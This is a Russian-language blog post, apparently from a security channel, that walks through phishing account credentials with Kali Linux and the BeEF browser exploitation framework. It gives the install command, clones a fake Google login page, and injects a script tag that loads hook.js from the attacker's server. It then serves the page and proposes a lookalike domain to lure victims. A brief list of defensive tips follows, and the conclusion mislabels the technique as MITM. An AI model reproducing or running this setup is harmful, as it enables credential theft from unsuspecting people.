Часто мне приходят вопросы по-типу: «Можно взломать аккаунт через ссылку?». В данной статье я отвечу на этот вопрос и покажу, как это делают хакеры с помощью Kali Linux и BeEF.
Всем салют, дорогие друзья! Часто мне приходят вопросы по-типу: «Можно взломать аккаунт через ссылку?». В данной статье я отвечу на этот вопрос и покажу, как это делают хакеры с помощью Kali Linux и BeEF.
Данный материал будет полезен новичкам и даже обычным пользователям. Изучение и понимание методов взлома и проникновения, поможет вам в соблюдении кибергигиены.
Нам понадобится
Итак, нам понадобится дистрибутив Kali Linux и фреймворк эксплуатации браузеров BeEF (Browser Exploit Framework). Это инструмент для взлома, который фокусируется на браузерах.
✅ BeEF позволяют создать фейк-страницу, содержащую JavaScript и менять контент в зависимости от конкретной жертвы.
Установка BeEF на Kali Linux
Для установки BeEF на Kali Linux используем следующую команду:
sudo apt install beef-xssКогда установка завершится, находим в приложениях фреймворк и запускаем пункт «beef start».
После этого откроется терминал, в котором будет предложено ввести новый пароль для веб-интерфейса BeEF. Также необходимо скопировать хук и сохранить в каком-нибудь текстовом файле. Позже нам будет необходимо вставить его в фейк-страницу.
Через несколько секунд браузер автоматически откроет веб-интерфейс BeEF. Самое время войти, используя созданную ранее учетную запись.
Создание фейк-страницы
Для этого примера предлагаю использовать страницу Google. Клонируем страницу Google из репозитория GitHub:
git clone https://github.com/anirudhbelwadi/Google-Landing-Page.gitТеперь отредактируем файл index.html и вставим ссылку на файл hook.js с сервера BeEF между тегами head:
<script src="http://<IP>:3000/hook.js"></script>
Проверим работу сервера с помощью python http.server, введя в терминале комманду:
python3 -m http.server 80
Открываем браузер и видим нашу фейк-страницу (поддельный сайт):
✅ Как видно на скрине выше, фейк-страница работает корректно. Супер!
Взлом через ссылку
Для получения внешнего IP злоумышленник будет использовать облачные сервисы и зарегистрирует какой-нибудь похожий на google.ru домен. Может подойти и бесплатный домен:
Далее все просто: пользователь нечего не подозревая вводит логин и пароль, а хакер, соответственно, получает эти данные.
Защита от взлома через ссылку и фейк-страницу
Я подготовил для вас несколько простых рекомендаций для защиты от подобной атаки:
Никогда не доверяйте полученным ссылкам. Особенное подозрение должны вызвать скрытые или укороченный ссылки. Перед переходом по такой ссылке, стоит расшифровать короткую ссылку и определить куда она ведет.
Всегда проверяйте домен (название сайта), когда хотите ввести учетные данные авторизации.
По возможности используйте расширение для блокировки JavaScript.
Никогда не заходите в свои аккаунты используя публичный сети WiFi. Для проверки почты или авторизации в соцсетях лучше использовать мобильную связь или надежный VPN.
Заключение
Рассмотренный в данной статье способ атаки называется MITM (человек посередине). Техника заключается в том, чтобы создать поддельный сайт и поддельный домен, а затем отправить пользователю фишинговое письмо с ссылкой на фейк-страницу. Данный вид атаки приносит лучший результат в связке с социальной инженерией.
✅ Теперь вы знаете, что взломать через ссылку вполне возможно, в особенности, если пользователь не интересуется информационной безопасностью.
⚡️Бонусы⚡️
Бонус в предыдущем посте на канале. Осталось всего 2 места.